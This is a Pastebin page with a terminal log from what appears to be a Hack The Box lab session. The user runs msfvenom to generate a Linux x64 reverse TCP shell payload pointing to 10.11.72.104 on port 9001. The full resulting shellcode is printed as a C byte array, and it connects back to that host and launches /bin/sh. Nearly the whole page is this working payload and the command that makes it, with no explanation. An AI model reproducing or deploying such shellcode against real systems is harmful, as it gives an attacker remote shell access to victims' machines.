Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- (venv) 😊:/home/tthtlc/site/htb>msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.11.72.104 LPORT=9001 -f c
- Running the 'init' command for the database:
- Existing database found, attempting to start it
- Starting database at /home/tthtlc/.msf4/db...pg_ctl: another server might be running; trying to start server anyway
- waiting for server to start.... done
- server started
- success
- [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
- [-] No arch selected, selecting arch: x64 from the payload
- No encoder specified, outputting raw payload
- Payload size: 74 bytes
- Final size of c file: 338 bytes
- unsigned char buf[] =
- "\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97"
- "\x48\xb9\x02\x00\x23\x29\x0a\x0b\x48\x68\x51\x48\x89\xe6"
- "\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce"
- "\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f"
- "\x62\x69\x6e\x2f\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48"
- "\x89\xe6\x0f\x05";
- (venv) 😊:/home/tthtlc/site/htb>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement